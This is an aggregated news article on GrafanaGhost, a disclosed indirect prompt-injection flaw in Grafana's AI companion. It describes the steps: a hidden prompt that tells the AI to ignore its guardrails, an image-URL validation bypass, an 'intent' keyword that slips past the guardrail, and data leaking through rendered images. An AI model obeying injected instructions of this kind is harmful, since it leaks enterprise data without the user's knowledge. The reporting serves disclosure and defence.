Fixed Intel
Aggregated IntelIndustry News

GrafanaGhost: Attackers Can Abuse Grafana to Leak Enterprise Data

By targeting Grafana’s AI components, attackers can point to external resources and inject indirect prompts to bypass safeguards.

FIFixed Intel Team||4 min read|2 Views
GrafanaGhost: Attackers Can Abuse Grafana to Leak Enterprise Data

Aggregated from SecurityWeek

This article was automatically aggregated from an external source. Content may be summarized.

Read Original

Full Analysis

A vulnerability in how Grafana’s AI components process information could allow attackers to bypass the application’s safeguards and leak enterprise information, new research from Noma Security shows.

An open source analytics and visualization application that ingests data from various sources, Grafana often has broad access to enterprise data, including financial metrics, infrastructure, customer information, and telemetry.

The newly discovered vulnerability, named GrafanaGhost, allows attackers to bypass client-side protections and security guardrails and link private data to external servers, exposing sensitive information in the background without user interaction.

An attacker can exploit the weakness by targeting Grafana’s AI-based capabilities when a user interacts with an entry log. In the background, a malicious prompt triggers the issue, turning Grafana into the exfiltration vessel.

To mount the attack, a threat actor needs to craft a path pointing to external resources. When processed by Grafana, the entry log provides the attacker with access to the enterprise environment.

Next, the attacker uses an indirect prompt hidden in the external context, instructing Grafana’s AI companion to ignore its guardrails and render an external image, forcing the system to acknowledge an external URL.

Advertisement. Scroll to continue reading.

When attempting to render the image, the AI companion makes a request to the attacker’s server, and the victim’s data is sent along as a URL parameter. “The data leaks the moment the system tries to display the image,” Noma says.

The issue, the cybersecurity firm discovered, was that the attacker could “fake the path of any company using Grafana” by guessing the data structure and model. Furthermore, an attacker could use a location where prompts would be saved within the application’s data store.

From there, the attacker could abuse Grafana to exfiltrate data via image tags by crafting their prompts accordingly. While Grafana has protections in place that prevent the loading of images from external domains, a flaw in a function that validates image URLs could be exploited to bypass the protection.

The AI model also has guardrails in place to prevent the injection of prompts that contain image markdown, but Noma discovered that the keyword “intent” could be used to bypass the protection and signal to the model that the instruction was legitimate.

“Chaining these discoveries together, we achieved automatic data exfiltration with zero user interaction. Data exfiltration occurs entirely in the background. To the data team, DevSecOps, or CISO, it looks like a typical day of data visualization,” Noma notes, adding that Grafana addressed the weaknesses immediately after being notified.

According to BeyondTrust deputy CISO Bradley Smith, the use of indirect prompt injections to exfiltrate data via rendered content is a well-known attack vector, and the exploitability against a hardened Grafana deployment is less clear.

“The practical exploitability depends heavily on deployment specifics; whether AI features are enabled, whether egress controls are in place, and how the environment handles external data ingestion. This isn’t a universal bypass of Grafana; it’s a demonstration of what can happen when AI components process untrusted input without sufficient architectural controls around them,” Smith said.

According to Acalvio CEO Ram Varadarajan, GrafanaGhost illustrates that the broad adoption of AI has shifted defenses beyond the application layer, requiring network-level URL blocking and hardening AI against prompt injection.

“Ultimately, this exploit proves that perimeter controls are insufficient. The only way to secure AI-driven tooling is to shift from monitoring what an agent is told to performing runtime behavioral monitoring of what it actually does,” Varadarajan said.

Related: Google DeepMind Researchers Map Web Attacks Against AI Agents

Related: Why Agentic AI Systems Need Better Governance – Lessons from OpenClaw

Related: AI, APIs and DDoS Collide in New Era of Coordinated Cyberattacks

Related: Vulnerability Allowed Hijacking Chrome’s Gemini Live AI Assistant


Originally published by SecurityWeek

Original Source

SecurityWeek